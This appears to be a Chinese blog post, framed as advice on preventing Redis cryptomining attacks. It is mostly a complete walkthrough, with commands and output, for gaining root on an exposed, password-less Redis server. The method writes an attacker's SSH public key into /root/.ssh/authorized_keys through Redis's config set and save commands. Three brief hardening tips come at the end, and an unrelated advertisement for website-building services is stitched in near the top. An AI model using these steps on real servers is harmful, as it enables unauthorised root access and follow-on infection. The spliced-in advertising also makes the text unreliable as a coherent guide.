這篇“redis挖礦怎么預(yù)防”文章的知識(shí)點(diǎn)大部分人都不太理解,所以小編給大家總結(jié)了以下內(nèi)容,內(nèi)容詳細(xì),步驟清晰,具有一定的借鑒價(jià)值,希望大家閱讀完這篇文章能有所收獲,下面我們一起來(lái)看看這篇“Redis挖礦怎么預(yù)防”文章吧。
10年的凌源網(wǎng)站建設(shè)經(jīng)驗(yàn),針對(duì)設(shè)計(jì)、前端、開(kāi)發(fā)、售后、文案、推廣等六對(duì)一服務(wù),響應(yīng)快,48小時(shí)及時(shí)工作處理。成都全網(wǎng)營(yíng)銷(xiāo)的優(yōu)勢(shì)是能夠根據(jù)用戶(hù)設(shè)備顯示端的尺寸不同,自動(dòng)調(diào)整凌源建站的顯示方式,使網(wǎng)站能夠適用不同顯示終端,在瀏覽器中調(diào)整網(wǎng)站的寬度,無(wú)論在任何一種瀏覽器上瀏覽網(wǎng)站,都能展現(xiàn)優(yōu)雅布局與設(shè)計(jì),從而大程度地提升瀏覽體驗(yàn)。成都創(chuàng)新互聯(lián)公司從事“凌源網(wǎng)站設(shè)計(jì)”,“凌源網(wǎng)站推廣”以來(lái),每個(gè)客戶(hù)項(xiàng)目都認(rèn)真落實(shí)執(zhí)行。
1、首先我們需要一些先決條件
條件一:你首先要有一個(gè)Redis,并且我們要知道他的端口【默認(rèn)6379】;
條件二:Redis的密碼不能過(guò)于復(fù)雜,或者沒(méi)有密碼;
條件三:?jiǎn)?dòng)Redis的用戶(hù)最好是Root用戶(hù),這樣破壞性更大;
2、開(kāi)始搞事情
2.1 創(chuàng)建一對(duì)秘鑰
通過(guò)ssh-keygen生成一對(duì),當(dāng)然可以使用已經(jīng)有的都沒(méi)有問(wèn)題。
root@kali:/usr/local/src# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
接下來(lái)通過(guò)公鑰生成攻擊鍵值
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
內(nèi)容如下
root@kali:/tmp/rediskey# cat foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
這里前后增加兩個(gè)換行符是為了防止數(shù)據(jù)連接在一起造成失效問(wèn)題。
2.2 配置Key到Redis中
操作如下:
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar OK
登錄Redis進(jìn)行檢查,是否已經(jīng)寫(xiě)入進(jìn)Redis中。
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129 192.168.243.129:6379> get bar "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
2.3 通過(guò)Redis保存機(jī)制替換系統(tǒng)文件
且看如下操作
192.168.243.129:6379> config set dir /root/.ssh OK 192.168.243.129:6379> config get dir 1) "dir" 2) "/root/.ssh" 192.168.243.129:6379> config set dbfilename "authorized_keys" OK 192.168.243.129:6379> save OK 192.168.243.129:6379> exit
這個(gè)時(shí)候,我們登錄遠(yuǎn)程主機(jī)看下效果。
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129 The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established. ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts. Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1 root@kali:~# w
OK,到這里我們已經(jīng)提權(quán)成功了,那我們看下導(dǎo)出文件到底是什么呢?其實(shí)就是Redis的保存文件形式罷了,有興趣可以自己打開(kāi)看看,這里不再展示。
3、如何預(yù)防
這個(gè)漏洞威力還是挺大的,我們現(xiàn)在只是拿到主機(jī)權(quán)限一個(gè)而已,加入放到定時(shí)任務(wù)執(zhí)行一些腳本然后在批量感染呢?
防范的技巧如下:
Redis不要監(jiān)聽(tīng)在危險(xiǎn)IP上,如果有請(qǐng)加防火墻控制;
Redis一定要增加密碼限制,且不能是弱口令;
Redis盡量不要用Root用戶(hù)身份來(lái)啟動(dòng)。
做到如上三點(diǎn)防范Redis挖礦,沒(méi)問(wèn)題的
以上就是關(guān)于“Redis挖礦怎么預(yù)防”這篇文章的內(nèi)容,相信大家都有了一定的了解,希望小編分享的內(nèi)容對(duì)大家有幫助,若想了解更多相關(guān)的知識(shí)內(nèi)容,請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。